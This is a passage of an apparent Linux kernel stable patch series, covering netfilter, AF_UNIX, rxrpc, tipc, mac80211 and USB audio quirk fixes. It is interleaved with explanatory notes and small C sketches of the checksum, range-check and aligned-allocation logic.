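The checksum fix above matters because csum_partial() only walks linear buffer memory, while the ICMPv6 payload of the locally built PMTU reply can live in skb fragments; skb_checksum() iterates the whole, possibly non-linear, skb. A toy model of the difference, with plain byte sums standing in for the ones'-complement checksum:

#include <stddef.h>
#include <stdint.h>

struct frag { const uint8_t *data; size_t len; };

/* Broken variant: only the first ("linear") fragment is summed. */
static uint32_t sum_linear_only(const struct frag *frags, int nfrags)
{
	uint32_t csum = 0;

	(void)nfrags;   /* everything past frags[0] is silently skipped */
	for (size_t j = 0; j < frags[0].len; j++)
		csum += frags[0].data[j];
	return csum;
}

/* Fixed variant: walk every fragment, as skb_checksum() does. */
static uint32_t sum_all(const struct frag *frags, int nfrags)
{
	uint32_t csum = 0;

	for (int i = 0; i < nfrags; i++)
		for (size_t j = 0; j < frags[i].len; j++)
			csum += frags[i].data[j];
	return csum;
}
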
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index c07645c999f9a..c6f0da028a2a4 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -7221,8 +7221,7 @@ int ieee80211_mgd_assoc(struct ieee80211_sub_if_data *sdata,
+ 
+ 		rcu_read_lock();
+ 		beacon_ies = rcu_dereference(req->bss->beacon_ies);
+-
+-		if (beacon_ies) {
++		if (!beacon_ies) {
+ 			/*
+ 			 * Wait up to one beacon interval ...
+ 			 * should this be more if we miss one?
+diff --git a/net/netfilter/nft_compat.c b/net/netfilter/nft_compat.c
+index 6952da7dfc02c..e1623fbf36548 100644
+--- a/net/netfilter/nft_compat.c
++++ b/net/netfilter/nft_compat.c
+@@ -135,7 +135,7 @@ static void nft_target_eval_bridge(const struct nft_expr *expr,
+ 
+ static const struct nla_policy nft_target_policy[NFTA_TARGET_MAX + 1] = {
+ 	[NFTA_TARGET_NAME]	= { .type = NLA_NUL_STRING },
+-	[NFTA_TARGET_REV]	= { .type = NLA_U32 },
++	[NFTA_TARGET_REV]	= NLA_POLICY_MAX(NLA_BE32, 255),
+ 	[NFTA_TARGET_INFO]	= { .type = NLA_BINARY },
+ };
+ 
+@@ -200,6 +200,7 @@ static const struct nla_policy nft_rule_compat_policy[NFTA_RULE_COMPAT_MAX + 1]
+ static int nft_parse_compat(const struct nlattr *attr, u16 *proto, bool *inv)
+ {
+ 	struct nlattr *tb[NFTA_RULE_COMPAT_MAX+1];
++	u32 l4proto;
+ 	u32 flags;
+ 	int err;
+ 
+@@ -212,12 +213,18 @@ static int nft_parse_compat(const struct nlattr *attr, u16 *proto, bool *inv)
+ 		return -EINVAL;
+ 
+ 	flags = ntohl(nla_get_be32(tb[NFTA_RULE_COMPAT_FLAGS]));
+-	if (flags & ~NFT_RULE_COMPAT_F_MASK)
++	if (flags & NFT_RULE_COMPAT_F_UNUSED ||
++	    flags & ~NFT_RULE_COMPAT_F_MASK)
+ 		return -EINVAL;
+ 	if (flags & NFT_RULE_COMPAT_F_INV)
+ 		*inv = true;
+ 
+-	*proto = ntohl(nla_get_be32(tb[NFTA_RULE_COMPAT_PROTO]));
++	l4proto = ntohl(nla_get_be32(tb[NFTA_RULE_COMPAT_PROTO]));
++	if (l4proto > U16_MAX)
++		return -EINVAL;
++
++	*proto = l4proto;
++
+ 	return 0;
+ }
+ 
+@@ -418,7 +425,7 @@ static void nft_match_eval(const struct nft_expr *expr,
+ 
+ static const struct nla_policy nft_match_policy[NFTA_MATCH_MAX + 1] = {
+ 	[NFTA_MATCH_NAME]	= { .type = NLA_NUL_STRING },
+-	[NFTA_MATCH_REV]	= { .type = NLA_U32 },
++	[NFTA_MATCH_REV]	= NLA_POLICY_MAX(NLA_BE32, 255),
+ 	[NFTA_MATCH_INFO]	= { .type = NLA_BINARY },
+ };
+ 
+@@ -721,7 +728,7 @@ out_put:
+ static const struct nla_policy nfnl_compat_policy_get[NFTA_COMPAT_MAX+1] = {
+ 	[NFTA_COMPAT_NAME]	= { .type = NLA_NUL_STRING,
+ 				    .len = NFT_COMPAT_NAME_MAX-1 },
+-	[NFTA_COMPAT_REV]	= { .type = NLA_U32 },
++	[NFTA_COMPAT_REV]	= NLA_POLICY_MAX(NLA_BE32, 255),
+ 	[NFTA_COMPAT_TYPE]	= { .type = NLA_U32 },
+ };
+ 
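
The nft_compat hunks tighten input validation in two places: the revision attributes move from an unbounded NLA_U32 policy to NLA_POLICY_MAX(NLA_BE32, 255), and the compat protocol is range-checked before being narrowed to the u16 the x_tables code expects. A sketch of the truncation check (parse_proto is an illustrative name, not the kernel's):

#include <stdint.h>
#include <errno.h>

static int parse_proto(uint32_t attr_value, uint16_t *proto)
{
	/* Without this check, e.g. 0x10006 would silently become 6. */
	if (attr_value > UINT16_MAX)
		return -EINVAL;
	*proto = (uint16_t)attr_value;
	return 0;
}
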
+diff --git a/net/netfilter/nft_ct.c b/net/netfilter/nft_ct.c
+index 1101665f52537..8df7564f0611e 100644
+--- a/net/netfilter/nft_ct.c
++++ b/net/netfilter/nft_ct.c
+@@ -484,6 +484,9 @@ static int nft_ct_get_init(const struct nft_ctx *ctx,
+ 		break;
+ #endif
+ 	case NFT_CT_ID:
++		if (tb[NFTA_CT_DIRECTION])
++			return -EINVAL;
++
+ 		len = sizeof(u32);
+ 		break;
+ 	default:
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 4e1cc31729b80..e1969209b3abb 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -342,9 +342,6 @@
+ #include "nft_set_pipapo_avx2.h"
+ #include "nft_set_pipapo.h"
+ 
+-/* Current working bitmap index, toggled between field matches */
+-static DEFINE_PER_CPU(bool, nft_pipapo_scratch_index);
+-
+ /**
+  * pipapo_refill() - For each set bit, set bits from selected mapping table item
+  * @map:	Bitmap to be scanned for set bits
+@@ -412,6 +409,7 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+ 		       const u32 *key, const struct nft_set_ext **ext)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
++	struct nft_pipapo_scratch *scratch;
+ 	unsigned long *res_map, *fill_map;
+ 	u8 genmask = nft_genmask_cur(net);
+ 	const u8 *rp = (const u8 *)key;
+@@ -422,15 +420,17 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+ 
+ 	local_bh_disable();
+ 
+-	map_index = raw_cpu_read(nft_pipapo_scratch_index);
+-
+ 	m = rcu_dereference(priv->match);
+ 
+ 	if (unlikely(!m || !*raw_cpu_ptr(m->scratch)))
+ 		goto out;
+ 
+-	res_map  = *raw_cpu_ptr(m->scratch) + (map_index ? m->bsize_max : 0);
+-	fill_map = *raw_cpu_ptr(m->scratch) + (map_index ? 0 : m->bsize_max);
++	scratch = *raw_cpu_ptr(m->scratch);
++
++	map_index = scratch->map_index;
++
++	res_map  = scratch->map + (map_index ? m->bsize_max : 0);
++	fill_map = scratch->map + (map_index ? 0 : m->bsize_max);
+ 
+ 	memset(res_map, 0xff, m->bsize_max * sizeof(*res_map));
+ 
+@@ -460,7 +460,7 @@ next_match:
+ 		b = pipapo_refill(res_map, f->bsize, f->rules, fill_map, f->mt,
+ 				  last);
+ 		if (b < 0) {
+-			raw_cpu_write(nft_pipapo_scratch_index, map_index);
++			scratch->map_index = map_index;
+ 			local_bh_enable();
+ 
+ 			return false;
+@@ -477,7 +477,7 @@ next_match:
+ 			 * current inactive bitmap is clean and can be reused as
+ 			 * *next* bitmap (not initial) for the next packet.
+ 			 */
+-			raw_cpu_write(nft_pipapo_scratch_index, map_index);
++			scratch->map_index = map_index;
+ 			local_bh_enable();
+ 
+ 			return true;
+@@ -1101,6 +1101,25 @@ static void pipapo_map(struct nft_pipapo_match *m,
+ 		f->mt[map[i].to + j].e = e;
+ }
+ 
++/**
++ * pipapo_free_scratch() - Free per-CPU map at original (not aligned) address
++ * @m:		Matching data
++ * @cpu:	CPU number
++ */
++static void pipapo_free_scratch(const struct nft_pipapo_match *m, unsigned int cpu)
++{
++	struct nft_pipapo_scratch *s;
++	void *mem;
++
++	s = *per_cpu_ptr(m->scratch, cpu);
++	if (!s)
++		return;
++
++	mem = s;
++	mem -= s->align_off;
++	kfree(mem);
++}
++
+ /**
+  * pipapo_realloc_scratch() - Reallocate scratch maps for partial match results
+  * @clone:	Copy of matching data with pending insertions and deletions
+@@ -1114,12 +1133,13 @@ static int pipapo_realloc_scratch(struct nft_pipapo_match *clone,
+ 	int i;
+ 
+ 	for_each_possible_cpu(i) {
+-		unsigned long *scratch;
++		struct nft_pipapo_scratch *scratch;
+ #ifdef NFT_PIPAPO_ALIGN
+-		unsigned long *scratch_aligned;
++		void *scratch_aligned;
++		u32 align_off;
+ #endif
+-
+-		scratch = kzalloc_node(bsize_max * sizeof(*scratch) * 2 +
++		scratch = kzalloc_node(struct_size(scratch, map,
++						   bsize_max * 2) +
+ 				       NFT_PIPAPO_ALIGN_HEADROOM,
+ 				       GFP_KERNEL, cpu_to_node(i));
+ 		if (!scratch) {
+@@ -1133,14 +1153,25 @@ static int pipapo_realloc_scratch(struct nft_pipapo_match *clone,
+ 			return -ENOMEM;
+ 		}
+ 
+-		kfree(*per_cpu_ptr(clone->scratch, i));
+-
+-		*per_cpu_ptr(clone->scratch, i) = scratch;
++		pipapo_free_scratch(clone, i);
+ 
+ #ifdef NFT_PIPAPO_ALIGN
+-		scratch_aligned = NFT_PIPAPO_LT_ALIGN(scratch);
+-		*per_cpu_ptr(clone->scratch_aligned, i) = scratch_aligned;
++		/* Align &scratch->map (not the struct itself): the extra
++		 * %NFT_PIPAPO_ALIGN_HEADROOM bytes passed to kzalloc_node()
++		 * above guarantee we can waste up to those bytes in order
++		 * to align the map field regardless of its offset within
++		 * the struct.
++		 */
++		BUILD_BUG_ON(offsetof(struct nft_pipapo_scratch, map) > NFT_PIPAPO_ALIGN_HEADROOM);
++
++		scratch_aligned = NFT_PIPAPO_LT_ALIGN(&scratch->map);
++		scratch_aligned -= offsetof(struct nft_pipapo_scratch, map);
++		align_off = scratch_aligned - (void *)scratch;
++
++		scratch = scratch_aligned;
++		scratch->align_off = align_off;
+ #endif
++		*per_cpu_ptr(clone->scratch, i) = scratch;
+ 	}
+ 
+ 	return 0;
+@@ -1294,11 +1325,6 @@ static struct nft_pipapo_match *pipapo_clone(struct nft_pipapo_match *old)
+ 	if (!new->scratch)
+ 		goto out_scratch;
+ 
+-#ifdef NFT_PIPAPO_ALIGN
+-	new->scratch_aligned = alloc_percpu(*new->scratch_aligned);
+-	if (!new->scratch_aligned)
+-		goto out_scratch;
+-#endif
+ 	for_each_possible_cpu(i)
+ 		*per_cpu_ptr(new->scratch, i) = NULL;
+ 
+@@ -1350,10 +1376,7 @@ out_lt:
+ 	}
+ out_scratch_realloc:
+ 	for_each_possible_cpu(i)
+-		kfree(*per_cpu_ptr(new->scratch, i));
+-#ifdef NFT_PIPAPO_ALIGN
+-	free_percpu(new->scratch_aligned);
+-#endif
++		pipapo_free_scratch(new, i);
+ out_scratch:
+ 	free_percpu(new->scratch);
+ 	kfree(new);
+@@ -1638,13 +1661,9 @@ static void pipapo_free_match(struct nft_pipapo_match *m)
+ 	int i;
+ 
+ 	for_each_possible_cpu(i)
+-		kfree(*per_cpu_ptr(m->scratch, i));
++		pipapo_free_scratch(m, i);
+ 
+-#ifdef NFT_PIPAPO_ALIGN
+-	free_percpu(m->scratch_aligned);
+-#endif
+ 	free_percpu(m->scratch);
+-
+ 	pipapo_free_fields(m);
+ 
+ 	kfree(m);
+@@ -2132,7 +2151,7 @@ static int nft_pipapo_init(const struct nft_set *set,
+ 	m->field_count = field_count;
+ 	m->bsize_max = 0;
+ 
+-	m->scratch = alloc_percpu(unsigned long *);
++	m->scratch = alloc_percpu(struct nft_pipapo_scratch *);
+ 	if (!m->scratch) {
+ 		err = -ENOMEM;
+ 		goto out_scratch;
+@@ -2140,16 +2159,6 @@ static int nft_pipapo_init(const struct nft_set *set,
+ 	for_each_possible_cpu(i)
+ 		*per_cpu_ptr(m->scratch, i) = NULL;
+ 
+-#ifdef NFT_PIPAPO_ALIGN
+-	m->scratch_aligned = alloc_percpu(unsigned long *);
+-	if (!m->scratch_aligned) {
+-		err = -ENOMEM;
+-		goto out_free;
+-	}
+-	for_each_possible_cpu(i)
+-		*per_cpu_ptr(m->scratch_aligned, i) = NULL;
+-#endif
+-
+ 	rcu_head_init(&m->rcu);
+ 
+ 	nft_pipapo_for_each_field(f, i, m) {
+@@ -2180,9 +2189,6 @@ static int nft_pipapo_init(const struct nft_set *set,
+ 	return 0;
+ 
+ out_free:
+-#ifdef NFT_PIPAPO_ALIGN
+-	free_percpu(m->scratch_aligned);
+-#endif
+ 	free_percpu(m->scratch);
+ out_scratch:
+ 	kfree(m);
+@@ -2236,11 +2242,8 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,
+ 
+ 		nft_set_pipapo_match_destroy(ctx, set, m);
+ 
+-#ifdef NFT_PIPAPO_ALIGN
+-		free_percpu(m->scratch_aligned);
+-#endif
+ 		for_each_possible_cpu(cpu)
+-			kfree(*per_cpu_ptr(m->scratch, cpu));
++			pipapo_free_scratch(m, cpu);
+ 		free_percpu(m->scratch);
+ 		pipapo_free_fields(m);
+ 		kfree(m);
+@@ -2253,11 +2256,8 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,
+ 		if (priv->dirty)
+ 			nft_set_pipapo_match_destroy(ctx, set, m);
+ 
+-#ifdef NFT_PIPAPO_ALIGN
+-		free_percpu(priv->clone->scratch_aligned);
+-#endif
+ 		for_each_possible_cpu(cpu)
+-			kfree(*per_cpu_ptr(priv->clone->scratch, cpu));
++			pipapo_free_scratch(priv->clone, cpu);
+ 		free_percpu(priv->clone->scratch);
+ 
+ 		pipapo_free_fields(priv->clone);
+diff --git a/net/netfilter/nft_set_pipapo.h b/net/netfilter/nft_set_pipapo.h
+index 25a75591583eb..30a3d092cd841 100644
+--- a/net/netfilter/nft_set_pipapo.h
++++ b/net/netfilter/nft_set_pipapo.h
+@@ -130,21 +130,29 @@ struct nft_pipapo_field {
+ 	union nft_pipapo_map_bucket *mt;
+ };
+ 
++/**
++ * struct nft_pipapo_scratch - percpu data used for lookup and matching
++ * @map_index:	Current working bitmap index, toggled between field matches
++ * @align_off:	Offset to get the originally allocated address
++ * @map:	store partial matching results during lookup
++ */
++struct nft_pipapo_scratch {
++	u8 map_index;
++	u32 align_off;
++	unsigned long map[];
++};
++
+ /**
+  * struct nft_pipapo_match - Data used for lookup and matching
+  * @field_count		Amount of fields in set
+  * @scratch:		Preallocated per-CPU maps for partial matching results
+- * @scratch_aligned:	Version of @scratch aligned to NFT_PIPAPO_ALIGN bytes
+  * @bsize_max:		Maximum lookup table bucket size of all fields, in longs
+  * @rcu			Matching data is swapped on commits
+  * @f:			Fields, with lookup and mapping tables
+  */
+ struct nft_pipapo_match {
+ 	int field_count;
+-#ifdef NFT_PIPAPO_ALIGN
+-	unsigned long * __percpu *scratch_aligned;
+-#endif
+-	unsigned long * __percpu *scratch;
++	struct nft_pipapo_scratch * __percpu *scratch;
+ 	size_t bsize_max;
+ 	struct rcu_head rcu;
+ 	struct nft_pipapo_field f[];
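
struct nft_pipapo_scratch above is the key to the whole pipapo rework: the map_index that used to live in a global per-CPU variable moves next to the map it indexes, and align_off records how far the struct was shifted to align map[], so the free path can hand kfree() the address kzalloc() originally returned. A userspace sketch of that align-and-remember trick (ALIGN_BYTES and both helpers are illustrative):

#include <stdint.h>
#include <stdlib.h>
#include <stddef.h>

#define ALIGN_BYTES 32   /* stand-in for NFT_PIPAPO_ALIGN */

struct scratch {
	uint8_t  map_index;
	uint32_t align_off;   /* distance back to the raw allocation */
	unsigned long map[];
};

static struct scratch *scratch_alloc(size_t map_longs)
{
	void *mem = calloc(1, sizeof(struct scratch) +
			      map_longs * sizeof(unsigned long) +
			      ALIGN_BYTES);
	uintptr_t map_addr;
	struct scratch *s;

	if (!mem)
		return NULL;

	/* Round &s->map up to the boundary, then step back so the
	 * struct header sits immediately before the aligned map. */
	map_addr = ((uintptr_t)mem + offsetof(struct scratch, map) +
		    ALIGN_BYTES - 1) & ~(uintptr_t)(ALIGN_BYTES - 1);
	s = (struct scratch *)(map_addr - offsetof(struct scratch, map));
	s->align_off = (uint32_t)((uintptr_t)s - (uintptr_t)mem);
	return s;
}

static void scratch_free(struct scratch *s)
{
	if (s)
		free((char *)s - s->align_off);   /* original pointer */
}
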
+diff --git a/net/netfilter/nft_set_pipapo_avx2.c b/net/netfilter/nft_set_pipapo_avx2.c
+index 52e0d026d30ad..90e275bb3e5d7 100644
+--- a/net/netfilter/nft_set_pipapo_avx2.c
++++ b/net/netfilter/nft_set_pipapo_avx2.c
+@@ -71,9 +71,6 @@
+ #define NFT_PIPAPO_AVX2_ZERO(reg)					\
+ 	asm volatile("vpxor %ymm" #reg ", %ymm" #reg ", %ymm" #reg)
+ 
+-/* Current working bitmap index, toggled between field matches */
+-static DEFINE_PER_CPU(bool, nft_pipapo_avx2_scratch_index);
+-
+ /**
+  * nft_pipapo_avx2_prepare() - Prepare before main algorithm body
+  *
+@@ -1120,11 +1117,12 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 			    const u32 *key, const struct nft_set_ext **ext)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+-	unsigned long *res, *fill, *scratch;
++	struct nft_pipapo_scratch *scratch;
+ 	u8 genmask = nft_genmask_cur(net);
+ 	const u8 *rp = (const u8 *)key;
+ 	struct nft_pipapo_match *m;
+ 	struct nft_pipapo_field *f;
++	unsigned long *res, *fill;
+ 	bool map_index;
+ 	int i, ret = 0;
+ 
+@@ -1141,15 +1139,16 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 	 */
+ 	kernel_fpu_begin_mask(0);
+ 
+-	scratch = *raw_cpu_ptr(m->scratch_aligned);
++	scratch = *raw_cpu_ptr(m->scratch);
+ 	if (unlikely(!scratch)) {
+ 		kernel_fpu_end();
+ 		return false;
+ 	}
+-	map_index = raw_cpu_read(nft_pipapo_avx2_scratch_index);
+ 
+-	res  = scratch + (map_index ? m->bsize_max : 0);
+-	fill = scratch + (map_index ? 0 : m->bsize_max);
++	map_index = scratch->map_index;
++
++	res  = scratch->map + (map_index ? m->bsize_max : 0);
++	fill = scratch->map + (map_index ? 0 : m->bsize_max);
+ 
+ 	/* Starting map doesn't need to be set for this implementation */
+ 
+@@ -1221,7 +1220,7 @@ next_match:
+ 
+ out:
+ 	if (i % 2)
+-		raw_cpu_write(nft_pipapo_avx2_scratch_index, !map_index);
++		scratch->map_index = !map_index;
+ 	kernel_fpu_end();
+ 
+ 	return ret >= 0;
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index e34662f4a71e0..5bf5572e945cc 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -235,7 +235,7 @@ static void nft_rbtree_gc_remove(struct net *net, struct nft_set *set,
+ 
+ static const struct nft_rbtree_elem *
+ nft_rbtree_gc_elem(const struct nft_set *__set, struct nft_rbtree *priv,
+-		   struct nft_rbtree_elem *rbe, u8 genmask)
++		   struct nft_rbtree_elem *rbe)
+ {
+ 	struct nft_set *set = (struct nft_set *)__set;
+ 	struct rb_node *prev = rb_prev(&rbe->node);
+@@ -254,7 +254,7 @@ nft_rbtree_gc_elem(const struct nft_set *__set, struct nft_rbtree *priv,
+ 	while (prev) {
+ 		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
+ 		if (nft_rbtree_interval_end(rbe_prev) &&
+-		    nft_set_elem_active(&rbe_prev->ext, genmask))
++		    nft_set_elem_active(&rbe_prev->ext, NFT_GENMASK_ANY))
+ 			break;
+ 
+ 		prev = rb_prev(prev);
+@@ -365,7 +365,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 		    nft_set_elem_active(&rbe->ext, cur_genmask)) {
+ 			const struct nft_rbtree_elem *removed_end;
+ 
+-			removed_end = nft_rbtree_gc_elem(set, priv, rbe, genmask);
++			removed_end = nft_rbtree_gc_elem(set, priv, rbe);
+ 			if (IS_ERR(removed_end))
+ 				return PTR_ERR(removed_end);
+ 
+diff --git a/net/rxrpc/conn_event.c b/net/rxrpc/conn_event.c
+index aab0697013982..5d91ef562ff78 100644
+--- a/net/rxrpc/conn_event.c
++++ b/net/rxrpc/conn_event.c
+@@ -41,6 +41,14 @@ static void rxrpc_conn_retransmit_call(struct rxrpc_connection *conn,
+ 
+ 	_enter("%d", conn->debug_id);
+ 
++	if (sp && sp->hdr.type == RXRPC_PACKET_TYPE_ACK) {
++		if (skb_copy_bits(skb, sizeof(struct rxrpc_wire_header),
++				  &pkt.ack, sizeof(pkt.ack)) < 0)
++			return;
++		if (pkt.ack.reason == RXRPC_ACK_PING_RESPONSE)
++			return;
++	}
++
+ 	chan = &conn->channels[channel];
+ 
+ 	/* If the last call got moved on whilst we were waiting to run, just
+diff --git a/net/tipc/bearer.c b/net/tipc/bearer.c
+index cdcd2731860ba..1cb9935620886 100644
+--- a/net/tipc/bearer.c
++++ b/net/tipc/bearer.c
+@@ -1088,6 +1088,12 @@ int tipc_nl_bearer_add(struct sk_buff *skb, struct genl_info *info)
+ 
+ #ifdef CONFIG_TIPC_MEDIA_UDP
+ 	if (attrs[TIPC_NLA_BEARER_UDP_OPTS]) {
++		if (b->media->type_id != TIPC_MEDIA_TYPE_UDP) {
++			rtnl_unlock();
++			NL_SET_ERR_MSG(info->extack, "UDP option is unsupported");
++			return -EINVAL;
++		}
++
+ 		err = tipc_udp_nl_bearer_add(b,
+ 					     attrs[TIPC_NLA_BEARER_UDP_OPTS]);
+ 		if (err) {
+diff --git a/net/unix/garbage.c b/net/unix/garbage.c
+index dc27635403932..767b338a7a2d4 100644
+--- a/net/unix/garbage.c
++++ b/net/unix/garbage.c
+@@ -314,6 +314,17 @@ void unix_gc(void)
+ 	/* Here we are. Hitlist is filled. Die. */
+ 	__skb_queue_purge(&hitlist);
+ 
++#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
++	list_for_each_entry_safe(u, next, &gc_candidates, link) {
++		struct sk_buff *skb = u->oob_skb;
++
++		if (skb) {
++			u->oob_skb = NULL;
++			kfree_skb(skb);
++		}
++	}
++#endif
++
+ 	spin_lock(&unix_gc_lock);
+ 
+ 	/* There could be io_uring registered files, just push them back to
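
The AF_UNIX hunk above makes the garbage collector drop any out-of-band skb still attached to a candidate socket, since an MSG_OOB skb can pin references that keep an otherwise-dead reference cycle alive past the hitlist purge. The detach-then-free shape in isolation, with illustrative types:

#include <stdlib.h>

struct buf { unsigned char payload[64]; };

static void buf_free(struct buf *b) { free(b); }

struct usock { struct buf *oob; };

static void gc_drop_oob(struct usock *u)
{
	struct buf *b = u->oob;

	if (b) {
		u->oob = NULL;   /* detach first, then release */
		buf_free(b);
	}
}
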
+diff --git a/sound/soc/amd/acp-config.c b/sound/soc/amd/acp-config.c
+index 9ee71a99a0871..0932473b63945 100644
+--- a/sound/soc/amd/acp-config.c
++++ b/sound/soc/amd/acp-config.c
+@@ -3,7 +3,7 @@
+ // This file is provided under a dual BSD/GPLv2 license. When using or
+ // redistributing this file, you may do so under either license.
+ //
+-// Copyright(c) 2021, 2023 Advanced Micro Devices, Inc.
++// Copyright(c) 2021 Advanced Micro Devices, Inc.
+ //
+ // Authors: Ajit Kumar Pandey <AjitKumar.Pandey@amd.com>
+ //
+@@ -35,19 +35,6 @@ static const struct config_entry config_table[] = {
+ 			{}
+ 		},
+ 	},
+-	{
+-		.flags = FLAG_AMD_LEGACY,
+-		.device = ACP_PCI_DEV_ID,
+-		.dmi_table = (const struct dmi_system_id []) {
+-			{
+-				.matches = {
+-					DMI_MATCH(DMI_SYS_VENDOR, "Valve"),
+-					DMI_MATCH(DMI_PRODUCT_NAME, "Jupiter"),
+-				},
+-			},
+-			{}
+-		},
+-	},
+ 	{
+ 		.flags = FLAG_AMD_SOF,
+ 		.device = ACP_PCI_DEV_ID,
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 33380cad3a735..b8a474a2e4d59 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2029,10 +2029,14 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_CTL_MSG_DELAY_1M | QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x0499, 0x1509, /* Steinberg UR22 */
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
++	DEVICE_FLG(0x0499, 0x3108, /* Yamaha YIT-W12TX */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x04d8, 0xfeea, /* Benchmark DAC1 Pre */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x04e8, 0xa051, /* Samsung USBC Headset (AKG) */
+ 		   QUIRK_FLAG_SKIP_CLOCK_SELECTOR | QUIRK_FLAG_CTL_MSG_DELAY_5M),
++	DEVICE_FLG(0x0525, 0xa4ad, /* Hamedal C20 usb camero */
++		   QUIRK_FLAG_IFACE_SKIP_CLOSE),
+ 	DEVICE_FLG(0x054c, 0x0b8c, /* Sony WALKMAN NW-A45 DAC */
+ 		   QUIRK_FLAG_SET_IFACE_FIRST),
+ 	DEVICE_FLG(0x0556, 0x0014, /* Phoenix Audio TMX320VC */
+@@ -2071,14 +2075,22 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+ 	DEVICE_FLG(0x0763, 0x2031, /* M-Audio Fast Track C600 */
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
++	DEVICE_FLG(0x07fd, 0x000b, /* MOTU M Series 2nd hardware revision */
++		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
+ 	DEVICE_FLG(0x08bb, 0x2702, /* LineX FM Transmitter */
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x0951, 0x16ad, /* Kingston HyperX */
+ 		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
+ 	DEVICE_FLG(0x0b0e, 0x0349, /* Jabra 550a */
+ 		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
++	DEVICE_FLG(0x0ecb, 0x205c, /* JBL Quantum610 Wireless */
++		   QUIRK_FLAG_FIXED_RATE),
++	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
++		   QUIRK_FLAG_FIXED_RATE),
+ 	DEVICE_FLG(0x0fd9, 0x0008, /* Hauppauge HVR-950Q */
+ 		   QUIRK_FLAG_SHARE_MEDIA_DEVICE | QUIRK_FLAG_ALIGN_TRANSFER),
++	DEVICE_FLG(0x1224, 0x2a25, /* Jieli Technology USB PHY 2.0 */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x1395, 0x740a, /* Sennheiser DECT */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x1397, 0x0507, /* Behringer UMC202HD */
+@@ -2111,6 +2123,10 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_ITF_USB_DSD_DAC | QUIRK_FLAG_CTL_MSG_DELAY),
+ 	DEVICE_FLG(0x1901, 0x0191, /* GE B850V3 CP2114 audio interface */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x19f7, 0x0035, /* RODE NT-USB+ */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x1bcf, 0x2283, /* NexiGo N930AF FHD Webcam */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x2040, 0x7200, /* Hauppauge HVR-950Q */
+ 		   QUIRK_FLAG_SHARE_MEDIA_DEVICE | QUIRK_FLAG_ALIGN_TRANSFER),
+ 	DEVICE_FLG(0x2040, 0x7201, /* Hauppauge HVR-950Q-MXL */
+@@ -2153,6 +2169,12 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x2912, 0x30c8, /* Audioengine D1 */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x2b53, 0x0023, /* Fiero SC-01 (firmware v1.0.0 @ 48 kHz) */
++		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
++	DEVICE_FLG(0x2b53, 0x0024, /* Fiero SC-01 (firmware v1.0.0 @ 96 kHz) */
++		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
++	DEVICE_FLG(0x2b53, 0x0031, /* Fiero SC-01 (firmware v1.1.0) */
++		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+ 	DEVICE_FLG(0x30be, 0x0101, /* Schiit Hel */
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x413c, 0xa506, /* Dell AE515 sound bar */
+@@ -2161,22 +2183,6 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_ALIGN_TRANSFER),
+ 	DEVICE_FLG(0x534d, 0x2109, /* MacroSilicon MS2109 */
+ 		   QUIRK_FLAG_ALIGN_TRANSFER),
+-	DEVICE_FLG(0x1224, 0x2a25, /* Jieli Technology USB PHY 2.0 */
+-		   QUIRK_FLAG_GET_SAMPLE_RATE),
+-	DEVICE_FLG(0x2b53, 0x0023, /* Fiero SC-01 (firmware v1.0.0 @ 48 kHz) */
